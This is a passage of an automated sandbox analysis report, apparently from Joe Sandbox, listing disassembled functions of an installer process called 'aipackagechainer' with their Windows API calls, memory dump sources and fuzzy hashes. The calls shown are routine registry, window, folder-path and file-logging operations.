                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: baab6c9b3e776a15bae216ffc6b259eede3d99a17e844c07bd7e1c5538e97d71
                                          • Instruction ID: 45cd31dff967794c86613eae3f273321fb6669f2f313ce0df82ddab69c006c4e
                                          • Opcode Fuzzy Hash: baab6c9b3e776a15bae216ffc6b259eede3d99a17e844c07bd7e1c5538e97d71
                                          • Instruction Fuzzy Hash: 34B012916AA031EE310493543D0BE3F111CD7C4B10330401EF001D4081D9400C200073
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: f9f3648afaaf472818b17a2c04da20e60d1347441c1580b29fbdf27ef4ea64da
                                          • Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
                                          • Opcode Fuzzy Hash: f9f3648afaaf472818b17a2c04da20e60d1347441c1580b29fbdf27ef4ea64da
                                          • Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: 74658f78c17b235db855615f642632796c57ba3512d90afdf1b19f4e4d3f30e5
                                          • Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
                                          • Opcode Fuzzy Hash: 74658f78c17b235db855615f642632796c57ba3512d90afdf1b19f4e4d3f30e5
                                          • Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: dbd46aa9d07e08f5ee2cbbd8dfbc596cde020214b0b01b793f5b2117e05a4105
                                          • Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
                                          • Opcode Fuzzy Hash: dbd46aa9d07e08f5ee2cbbd8dfbc596cde020214b0b01b793f5b2117e05a4105
                                          • Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: 2c4a4c1de54f8b30b085dde80dba8c1331855f4f9bbb16e80ea3f5c9d69398d7
                                          • Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
                                          • Opcode Fuzzy Hash: 2c4a4c1de54f8b30b085dde80dba8c1331855f4f9bbb16e80ea3f5c9d69398d7
                                          • Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6
                                          APIs
                                          • RegEnumValueA.KERNELBASE(?,?,?,?,00000000,?,00000000,?,D11C52E5), ref: 0009C78E
                                          • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?,?), ref: 0009C7BA
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                            • Part of subcall function 0006C7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,?,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C7DD
                                            • Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C80E
                                            • Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000,?,8000000B,D11C52E5,?,?), ref: 0006C845
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ByteCharEnumMultiValueWide$FindHeapProcessResource
                                          • String ID:
                                          • API String ID: 4070800961-0
                                          • Opcode ID: 2f31d91a495a32ee701e0f51754d6c65e72caa89fe5c1fdfa6c075998f6ee8e6
                                          • Instruction ID: 08aeec4b65c81cca5f621edc951df43426f9dac3e30ac82a2fe6186e4ca7cee2
                                          • Opcode Fuzzy Hash: 2f31d91a495a32ee701e0f51754d6c65e72caa89fe5c1fdfa6c075998f6ee8e6
                                          • Instruction Fuzzy Hash: FEA16D71900149DFDB04DFA8C884BEEBBF9FF48310F148169E915AB292DB349E04CBA1
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 000A8542
                                          • EndDialog.USER32(00000000,00000001), ref: 000A8551
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: DialogWindow
                                          • String ID:
                                          • API String ID: 2634769047-0
                                          • Opcode ID: e1b7d7ff9d06815b3a4401743323f5100bdb8feb0b4c31cebc01c290551f343c
                                          • Instruction ID: a7ddd3388331c933f14aec004aff0bcc61cba43978faffa5d7659385a71f4389
                                          • Opcode Fuzzy Hash: e1b7d7ff9d06815b3a4401743323f5100bdb8feb0b4c31cebc01c290551f343c
                                          • Instruction Fuzzy Hash: 1C617A30901B89DFE711CFA8C948B8AFBF4BF4A310F14C6A9D445DB2A1DB749A44CB91
                                          APIs
                                          • EnableWindow.USER32(?,00000000), ref: 000982A1
                                            • Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 000A7B74
                                            • Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000A7B7F
                                            • Part of subcall function 00098500: GetDlgItem.USER32(?,00000002), ref: 00098520
                                            • Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098536
                                            • Part of subcall function 00098500: ShowWindow.USER32(00000000,00000000,?,?,?,?,0009717A), ref: 0009854F
                                            • Part of subcall function 00098500: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0009717A), ref: 0009855A
                                            • Part of subcall function 00098500: GetDlgItem.USER32(00000000,000003E9), ref: 0009856C
                                            • Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098582
                                            • Part of subcall function 00098500: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0009717A), ref: 000985C5
                                            • Part of subcall function 00098930: GetWindowLongW.USER32(?,000000F0), ref: 00098977
                                            • Part of subcall function 00098930: GetParent.USER32(00000000), ref: 0009898A
                                            • Part of subcall function 00098930: GetWindowRect.USER32(?,?), ref: 000989AB
                                            • Part of subcall function 00098930: GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
                                            • Part of subcall function 00098930: MonitorFromWindow.USER32(?,00000002), ref: 000989D6
                                            • Part of subcall function 00098930: GetMonitorInfoW.USER32(00000000,?), ref: 000989EC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ItemLongMessageMonitorSend$EnableFromInfoInvalidateParentShow
                                          • String ID:
                                          • API String ID: 2603943895-0
                                          • Opcode ID: a25c7e87c5dd21f19cfd77a8c66a4790c3b3e71b30d2b81af139d1591751696e
                                          • Instruction ID: 098f8a0151bcdb7c1f57b5d63c418c9d48220f9763eea66ac9623740045bf459
                                          • Opcode Fuzzy Hash: a25c7e87c5dd21f19cfd77a8c66a4790c3b3e71b30d2b81af139d1591751696e
                                          • Instruction Fuzzy Hash: 091104726105095BEB209F08EC06BEA7794EB56320F008223FC05C7791DBB5EC65EBE5
                                          APIs
                                            • Part of subcall function 00087860: LoadLibraryW.KERNEL32(ComCtl32.dll,D11C52E5,?,00000000,00000000), ref: 0008789E
                                            • Part of subcall function 00087860: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 000878C1
                                            • Part of subcall function 00087860: FreeLibrary.KERNEL32(00000000), ref: 0008793F
                                            • Part of subcall function 00087860: GetSystemMetrics.USER32(0000000C), ref: 000878FC
                                            • Part of subcall function 00087860: GetSystemMetrics.USER32(0000000B), ref: 00087912
                                            • Part of subcall function 00087860: LoadImageW.USER32(?,?,00000001,00000000,00000000,?), ref: 00087921
                                          • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 000A7B74
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000A7B7F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: LibraryLoadMessageMetricsSendSystem$AddressFreeImageProc
                                          • String ID:
                                          • API String ID: 852476325-0
                                          • Opcode ID: 9cc751d1193d7f64e775cb1247048e85a4b9c6687fa1b2a37ba6382087537c4e
                                          • Instruction ID: a927765f1e71be3e7b3f3e26a917ad3da264748cb6854e408866400432315af6
                                          • Opcode Fuzzy Hash: 9cc751d1193d7f64e775cb1247048e85a4b9c6687fa1b2a37ba6382087537c4e
                                          • Instruction Fuzzy Hash: F6F0303178521C37F660215A5C4BF67B64DE781B64F244276FA98AB3D2ECC67C0043D8
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840B8
                                          • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,D11C52E5,-00000001,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840EA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 626452242-0
                                          • Opcode ID: 8920bce0894b6656323e010f70b6d1b6862cbe135b127f76559f0d1b958f8b1f
                                          • Instruction ID: 0ede13f0b2929367b42ab8cff03cf8b6626a206b9e8f9ce7b7dc5bfa7f590b4d
                                          • Opcode Fuzzy Hash: 8920bce0894b6656323e010f70b6d1b6862cbe135b127f76559f0d1b958f8b1f
                                          • Instruction Fuzzy Hash: FF01D635301512AFEA109B59DC8DF5EB796EF94361F20412AF3159B2D0CF606C518790
                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000000,D11C52E5,?,?,000EFF5D,000000FF), ref: 00079D54
                                            • Part of subcall function 00077790: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00077893
                                            • Part of subcall function 000CB520: GetCurrentThreadId.KERNEL32 ref: 000CB52C
                                            • Part of subcall function 000CB520: __Mtx_unlock.LIBCPMT ref: 000CB56B
                                            • Part of subcall function 000CB520: __Cnd_broadcast.LIBCPMT ref: 000CB573
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Cnd_broadcastCurrentFolderInitializeMtx_unlockPathThread
                                          • String ID:
                                          • API String ID: 3188518339-0
                                          • Opcode ID: 83a33c42d7406131d0bc8a75ef87e8dab1baada55c221cf67f6a31b5cc3e5271
                                          • Instruction ID: 05dfc6491fde56ddad65f1a4fecc182c3d0d9300cd4ab88f1df12468e304fe18
                                          • Opcode Fuzzy Hash: 83a33c42d7406131d0bc8a75ef87e8dab1baada55c221cf67f6a31b5cc3e5271
                                          • Instruction Fuzzy Hash: D621DC71A05704AFD720DF64CC01FAAB7E8EF09720F10852AFA299B691D774AC008B94
                                          APIs
                                          • EndDialog.USER32(?,00000002), ref: 000A0133
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Dialog
                                          • String ID:
                                          • API String ID: 1120787796-0
                                          • Opcode ID: de8f4aa5b987ea08eeb44bf7f66f7d642ed292e5bb967a014a9a57a0dcb8b0b8
                                          • Instruction ID: ba3d659b782eacadea2c96c168058862ce7c695929cd2ee1294fe589e8a18395
                                          • Opcode Fuzzy Hash: de8f4aa5b987ea08eeb44bf7f66f7d642ed292e5bb967a014a9a57a0dcb8b0b8
                                          • Instruction Fuzzy Hash: BEF04970505300EFE728DF20D949FA6BBE2BF45709F14896DE4950BAA2C776EC01DB41
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,0000000C), ref: 0009C552
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: c4919ba99b62e7579423647dad236cdd2e5e152aae6207dedd04cd3846556f9d
                                          • Instruction ID: 4a0ebfc558ba02a071e7703cb249ac9717eaa16f06b90370b37db91c791fc93b
                                          • Opcode Fuzzy Hash: c4919ba99b62e7579423647dad236cdd2e5e152aae6207dedd04cd3846556f9d
                                          • Instruction Fuzzy Hash: FA019EB6904608BFE710CF44CD01F9AFBE8EB05724F10426AE914977D0D7F56914CB90
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000DD487,00000001,00000364,00000000,00000006,000000FF,?,000D719D,00000000,?,?,0009FC3D), ref: 000DE00B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 70ba317a710b8ce98177694ae5a6466b863d4f0ddc9fcd6c4c3bcef50d100de1
                                          • Instruction ID: 2523e7978d6c8891ae4e269f1a6299e1633a794ae68ee75ed5b82e78b7d971c0
                                          • Opcode Fuzzy Hash: 70ba317a710b8ce98177694ae5a6466b863d4f0ddc9fcd6c4c3bcef50d100de1
                                          • Instruction Fuzzy Hash: 6AF0B43160036567AB716B21DC0ABAA7BC89B52760B1C8123B808DE392CAA0DC41D2F0
                                          APIs
                                            • Part of subcall function 000CE06E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,80004005,D11C52E5,?,00000000), ref: 000CE0CE
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionHeapRaise
                                          • String ID:
                                          • API String ID: 3789339297-0
                                          • Opcode ID: 084245f25598a959c76439c7658d5c5d2959c195025d72cc91f704bbfedebc6c
                                          • Instruction ID: f8c1e687f6af3d6544c37d558adc297bbb58de9dbc9f80d7d4a1a0b4e7eb34a4
                                          • Opcode Fuzzy Hash: 084245f25598a959c76439c7658d5c5d2959c195025d72cc91f704bbfedebc6c
                                          • Instruction Fuzzy Hash: 46F0A73164864CFFC711DF54DC01F5ABBA9F704B10F10462EF91587AA0DB76AA11CA84
                                          APIs
                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,SystemFolder,0000000C), ref: 0008FF65
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00090069
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 00090170
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 0009027D
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 000903EC
                                            • Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,0000000D,WindowsVolume,0000000D), ref: 000904D2
                                          • LoadLibraryW.KERNEL32(shfolder.dll), ref: 00090560
                                          • GetProcAddress.KERNEL32(?,SHGetFolderPathW), ref: 00090592
                                          • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 00090770
                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 000907E9
                                          • SHGetMalloc.SHELL32(00000000), ref: 00090802
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Directory$FolderPathWindows$AddressEnvironmentFileFindFromHeapLibraryListLoadLocationMallocModuleNameProcProcessResourceSpecialSystemVariable
                                          • String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFiles64Folder$ProgramFilesFolder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$Shell32.dll$Shlwapi.dll$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                          • API String ID: 700146523-2261365735
                                          • Opcode ID: 0b19073670840a47fcf5533028e560c7026b341b261457387579d719393d61f7
                                          • Instruction ID: 9702283dab4d7b7bcc8c72347410f2b846f39f510049f215d62b0f6c60239179
                                          • Opcode Fuzzy Hash: 0b19073670840a47fcf5533028e560c7026b341b261457387579d719393d61f7
                                          • Instruction Fuzzy Hash: 00520671A002059FDF64DF24CC45BBAB3B6FF50714F5442A8D9469B2A1EB32DE81DB90
                                          APIs
                                          • CreateFileW.KERNEL32(00129B20,C0000000,00000003,00000000,00000004,00000080,00000000,D11C52E5,00129AFC,00129B14,D11C52E5), ref: 00088900
                                          • GetLastError.KERNEL32 ref: 0008891D
                                          • OutputDebugStringW.KERNEL32(00000000,00000020), ref: 00088996
                                          • OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 00088A9A
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 00088B0B
                                          • WriteFile.KERNEL32(00000000,001298F4,00000000,000000FF,00000000,?,0000001C), ref: 00088B3B
                                          • WriteFile.KERNEL32(00000000,000000B7,?,000000FF,00000000,0010C440,00000002), ref: 00088BE6
                                          • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00088BEF
